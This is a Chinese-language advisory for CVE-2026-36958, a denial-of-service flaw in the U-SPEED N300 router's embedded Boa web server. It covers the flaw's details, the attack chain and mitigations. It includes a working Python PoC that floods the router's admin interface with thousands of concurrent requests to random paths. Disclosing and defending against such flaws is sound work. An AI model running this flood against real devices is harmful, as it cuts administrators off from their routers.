CVE-2026-36958 CVSS 7.5 高危

CVE-2026-36958 U-SPEED N300路由器拒绝服务漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36958

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

U-SPEED N300 无线路由器

漏洞概述

U-SPEED N300 V1.0.0 无线路由器存在拒绝服务漏洞。该漏洞源于嵌入式 Boa HTTP 服务器未能正确处理高并发的 HTTP 请求。攻击者无需认证即可向 Web 管理界面的随机或不存在端点发送大量并发请求，导致系统资源耗尽，使路由器 Web 界面无响应，需手动重启才能恢复正常。

技术细节

该漏洞位于 U-SPEED N300 路由器的嵌入式 Boa HTTP 服务器组件中。由于服务器未对并发连接数或请求频率实施有效的限制机制，攻击者可以利用网络向量发起攻击。利用过程中，攻击者向路由器 Web 管理接口（通常为端口 80 或 8080）发送大量指向随机路径（如 /admin_random.php）的 HTTP 请求。这种资源耗尽攻击会导致 Boa 服务器进程挂起或崩溃，从而阻断合法的管理访问。虽然该漏洞不影响数据的机密性和完整性，但会严重破坏系统的可用性（A:H），导致设备管理功能失效。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络或通过社工获取目标 U-SPEED N300 路由器的 Web 管理界面 IP 地址。

STEP 2

2. 发起攻击

攻击者编写脚本，向目标路由器的 Web 接口发送大量针对随机端点的并发 HTTP GET/POST 请求。

STEP 3

3. 资源耗尽

嵌入式 Boa 服务器因处理大量无效请求而消耗尽所有可用内存或连接池，导致服务挂起。

STEP 4

4. 拒绝服务

合法管理员无法访问 Web 管理界面，路由器管理功能瘫痪，需要人工干预重启。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import aiohttp

# Target configuration
TARGET_URL = "http://192.168.1.1/"
# Total number of requests to send
TOTAL_REQUESTS = 5000
# Concurrency level
CONCURRENCY = 100

async def send_request(session, i):
    try:
        # Target a non-existent endpoint to potentially trigger heavier processing paths
        url = f"{TARGET_URL}/vuln_test_{i}.html"
        async with session.get(url, timeout=aiohttp.ClientTimeout(total=5)) as response:
            await response.read()
    except Exception:
        # Ignore connection errors or timeouts as the goal is resource exhaustion
        pass

async def main():
    print(f"Starting DoS PoC against {TARGET_URL}")
    connector = aiohttp.TCPConnector(limit=0, ttl_dns_cache=300)
    async with aiohttp.ClientSession(connector=connector) as session:
        tasks = []
        for i in range(TOTAL_REQUESTS):
            task = asyncio.create_task(send_request(session, i))
            tasks.append(task)
            # Control concurrency
            if len(tasks) >= CONCURRENCY:
                await asyncio.gather(*tasks)
                tasks = []
        
        if tasks:
            await asyncio.gather(*tasks)
    print("PoC execution finished.")

if __name__ == "__main__":
    asyncio.run(main())

影响范围

U-SPEED N300 V1.0.0

防御指南

临时缓解措施

如果无法立即升级固件，建议通过边界防火墙阻断外部网络对路由器管理端口（通常为 80/443/8080）的访问，仅允许内部特定管理主机连接。此外，应密切监控路由器的 CPU 和内存使用情况，一旦发现异常激增，应及时物理重启设备或断开网络连接以恢复服务。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-36958
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-36958
3 Details https://www.cvedetails.com/cve/CVE-2026-36958/
4 VulDB https://vuldb.com/cve/CVE-2026-36958
5 Link http://u-speed.com
6 Link https://github.com/kirubel-cve/CVE-2026-36958

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表